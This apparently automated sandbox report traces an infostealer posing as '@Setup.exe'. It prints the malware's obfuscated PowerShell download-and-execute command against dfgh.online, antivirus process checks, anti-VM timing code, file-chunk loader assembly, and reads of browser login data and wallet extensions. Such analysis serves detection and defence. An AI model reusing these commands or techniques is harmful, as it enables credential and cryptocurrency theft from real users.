      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Window found: window name: TMainForm
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: @Setup.exe Static file information: File size 73409778 > 1048576
      Source: @Setup.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2076653655.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2078181481.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2076153750.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
      Source: C:\Users\user\Desktop\@Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe.12.dr Static PE information: real checksum: 0x9307ce should be: 0x8615ed
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.dr Static PE information: real checksum: 0x33908a should be: 0x33af29
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe.12.dr Static PE information: section name: .didata
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.19.dr Static PE information: section name: .didata
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp.21.dr Static PE information: section name: .didata
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_052B3655 push ebx; iretd 17_2_052B36DA

      Persistence and Installation Behavior

      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-GC8MC.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeFile created: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exeFile created: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmpFile created: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\@Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com System information queried: FirmwareTableInformation
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe API/Special instruction interceptor: Address: 6BB27C44
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BB2F3E1 second address: 6BB2F3FD instructions:
        0x00000000 rdtsc
        0x00000002 mov dword ptr [ebp-20h], eax
        0x00000005 mov dword ptr [ebp-1Ch], edx
        0x00000008 lea esi, dword ptr [ebp-38h]
        0x0000000b xor eax, eax
        0x0000000d xor ecx, ecx
        0x0000000f cpuid
        0x00000011 mov dword ptr [esi], eax
        0x00000013 mov dword ptr [esi+04h], ebx
        0x00000016 mov dword ptr [esi+08h], ecx
        0x00000019 mov dword ptr [esi+0Ch], edx
        0x0000001c rdtsc
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BB2F3FD second address: 6BB2F3E1 instructions:
        0x00000000 rdtsc
        0x00000002 mov dword ptr [ebp-18h], eax
        0x00000005 mov dword ptr [ebp-14h], edx
        0x00000008 mov eax, dword ptr [ebp-18h]
        0x0000000b sub eax, dword ptr [ebp-20h]
        0x0000000e mov ecx, dword ptr [ebp-14h]
        0x00000011 sbb ecx, dword ptr [ebp-1Ch]
        0x00000014 add eax, dword ptr [ebp-10h]
        0x00000017 adc ecx, dword ptr [ebp-0Ch]
        0x0000001a mov dword ptr [ebp-10h], eax
        0x0000001d mov dword ptr [ebp-0Ch], ecx
        0x00000020 jmp 00007F9594BA3A75h
        0x00000022 mov edx, dword ptr [ebp-04h]
        0x00000025 add edx, 01h
        0x00000028 mov dword ptr [ebp-04h], edx
        0x0000002b cmp dword ptr [ebp-04h], 64h
        0x0000002f jnl 00007F9594BA3B00h
        0x00000031 rdtsc
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3622
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2781
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-729SP.tmp\_isetup\_isdecmp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_setup64.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-HQ5R8.tmp\_isetup\_isdecmp.dll
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com TID: 6512 Thread sleep time: -150000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2656 Thread sleep count: 3622 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2664 Thread sleep count: 2781 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224 Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\@Setup.exe Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\@Setup.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000002.2251383520.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: @Setup.exe, 00000000.00000002.1666807792.0000000000756000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
      Source: powershell.exe, 00000011.00000002.2076683516.0000000007BA0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\@Setup.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe NtQuerySystemInformation: Direct from: 0x4585B0
      Source: C:\Users\user\Desktop\@Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 504701
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Cc
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Housewares" Expressions
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Corporation.com u
      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT
      Source: C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
      Source: Corporation.com, 0000000C.00000000.1694698460.0000000000F43000.00000002.00000001.01000000.00000007.sdmp, Corporation.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: BrightLib.exe, 00000032.00000000.2656181332.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000032.00000002.2696752317.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-GC8MC.tmp.22.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\c9ceaed2 VolumeInformation
      Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 50_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,50_2_00491486
      Source: C:\Users\user\Desktop\@Setup.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: find.exe, 00000029.00000002.2605506592.000001F0205C0000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000029.00000002.2605546242.000001F02060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
